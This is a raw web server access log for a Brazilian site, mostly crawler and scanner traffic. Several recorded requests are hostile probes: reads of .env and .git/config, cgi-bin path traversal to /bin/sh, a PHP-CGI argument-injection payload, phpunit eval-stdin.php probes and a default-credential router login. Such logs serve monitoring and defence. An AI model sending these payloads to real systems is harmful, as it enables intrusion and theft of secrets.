159.223.209.62 - - [28/Apr/2025:18:44:54 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:54 -0300] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:55 -0300] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
159.223.209.62 - - [28/Apr/2025:18:44:55 -0300] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:19:02:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
159.89.121.64 - - [28/Apr/2025:19:13:33 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
159.89.121.64 - - [28/Apr/2025:19:13:33 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
172.232.188.177 - - [28/Apr/2025:19:31:45 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
172.232.188.177 - - [28/Apr/2025:19:33:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML"
vacivitta.com.br:80
172.232.188.177 - - [28/Apr/2025:19:33:09 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML"
vacivitta.com.br:80
172.232.188.177 - - [28/Apr/2025:19:33:18 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
172.232.188.177 - - [28/Apr/2025:19:33:29 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
172.232.188.177 - - [28/Apr/2025:19:33:29 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
5.182.209.113 - - [28/Apr/2025:19:42:51 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
5.182.209.113 - - [28/Apr/2025:19:42:51 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
5.182.209.113 - - [28/Apr/2025:19:42:51 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
5.182.209.113 - - [28/Apr/2025:19:42:51 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:19:44:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:19:49:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
148.113.206.49 - - [28/Apr/2025:20:03:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
185.218.84.178 - - [28/Apr/2025:20:06:07 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:20:39:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
167.94.138.36 - - [28/Apr/2025:20:40:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.36 - - [28/Apr/2025:20:40:11 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.36 - - [28/Apr/2025:20:40:13 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.36 - - [28/Apr/2025:20:40:16 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
167.94.138.36 - - [28/Apr/2025:20:40:23 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.36 - - [28/Apr/2025:20:40:34 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.138.36 - - [28/Apr/2025:20:40:36 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:20:41:00 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:20:43:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
196.251.87.86 - - [28/Apr/2025:21:01:03 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (iPad; CPU OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1"
vacivitta.com.br:80
43.133.253.253 - - [28/Apr/2025:21:01:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:21:06:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [28/Apr/2025:21:08:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:21:28:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:21:57:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
87.251.78.46 - - [28/Apr/2025:22:18:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:22:23:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
5.181.2.11 - - [28/Apr/2025:23:02:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
vacivitta.com.br:80
5.181.2.11 - - [28/Apr/2025:23:02:25 -0300] "GET /wp-admin/install.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36"
vacivitta.com.br:80
5.181.2.11 - - [28/Apr/2025:23:02:25 -0300] "GET /feed/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
vacivitta.com.br:80
5.181.2.11 - - [28/Apr/2025:23:02:26 -0300] "GET /?feed=rss2 HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.25"
vacivitta.com.br:80
68.48.80.38 - - [28/Apr/2025:23:04:26 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:23:05:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:23:22:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:23:38:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [28/Apr/2025:23:57:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [29/Apr/2025:00:05:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
35.195.81.190 - - [29/Apr/2025:00:15:21 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:00:21:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [29/Apr/2025:00:39:33 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
78.153.140.224 - - [29/Apr/2025:00:44:42 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
20.84.146.240 - - [29/Apr/2025:00:44:46 -0300] "MGLNDD_162.240.168.168_80\n" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:00:57:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:01:31:56 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [29/Apr/2025:01:42:28 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [29/Apr/2025:01:45:28 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
43.166.7.113 - - [29/Apr/2025:01:49:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
198.235.24.82 - - [29/Apr/2025:01:55:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:01:56:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
205.210.31.56 - - [29/Apr/2025:02:15:38 -0300] "GET / HTTP/1.0" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
185.242.226.154 - - [29/Apr/2025:02:27:59 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [29/Apr/2025:02:29:12 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
154.81.156.7 - - [29/Apr/2025:03:05:57 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
185.218.86.4 - - [29/Apr/2025:03:13:40 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
93.174.93.12 - - [29/Apr/2025:03:14:01 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:03:21:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
220.81.231.111 - - [29/Apr/2025:03:33:59 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:14 -0300] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:14 -0300] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:14 -0300] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:15 -0300] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:15 -0300] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:15 -0300] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:16 -0300] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:16 -0300] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:16 -0300] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:17 -0300] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:17 -0300] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:17 -0300] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:18 -0300] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:18 -0300] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:18 -0300] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:18 -0300] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:19 -0300] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:19 -0300] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:19 -0300] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:20 -0300] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:20 -0300] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:20 -0300] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:21 -0300] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:21 -0300] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:21 -0300] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:22 -0300] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:22 -0300] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:22 -0300] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:23 -0300] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:23 -0300] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
51.15.247.112 - - [29/Apr/2025:03:40:23 -0300] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:03:58:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [29/Apr/2025:04:08:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:04:26:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
122.96.50.130 - - [29/Apr/2025:04:33:40 -0300] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
185.218.84.178 - - [29/Apr/2025:04:41:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
43.153.58.28 - - [29/Apr/2025:04:52:17 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
205.210.31.214 - - [29/Apr/2025:04:59:51 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
205.210.31.214 - - [29/Apr/2025:04:59:51 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:05:11:47 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [29/Apr/2025:05:24:01 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.7 - - [29/Apr/2025:05:29:56 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
80.82.77.202 - - [29/Apr/2025:05:34:19 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) snap Chromium/76.0.3809.100 Chrome/76.0.3809.100 Safari/537.36"
vacivitta.com.br:80
185.166.252.18 - - [29/Apr/2025:05:36:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
185.218.86.4 - - [29/Apr/2025:05:48:20 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
184.105.247.254 - - [29/Apr/2025:05:51:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78"
vacivitta.com.br:80
184.105.247.254 - - [29/Apr/2025:05:54:18 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
vacivitta.com.br:80
184.105.247.254 - - [29/Apr/2025:05:54:54 -0300] "GET /geoserver/web/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.78"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:06:06:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
64.227.2.136 - - [29/Apr/2025:06:10:36 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
64.227.2.136 - - [29/Apr/2025:06:10:36 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
154.81.156.35 - - [29/Apr/2025:06:12:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
65.49.20.67 - - [29/Apr/2025:06:19:29 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
20.14.75.2 - - [29/Apr/2025:06:21:06 -0300] "GET /druid/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
104.234.115.85 - - [29/Apr/2025:06:24:08 -0300] "GET / HTTP/1.0" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
104.234.115.85 - - [29/Apr/2025:06:24:36 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.85 - - [29/Apr/2025:06:25:04 -0300] "GET / HTTP/1.1" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
213.138.89.236 - - [29/Apr/2025:06:33:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
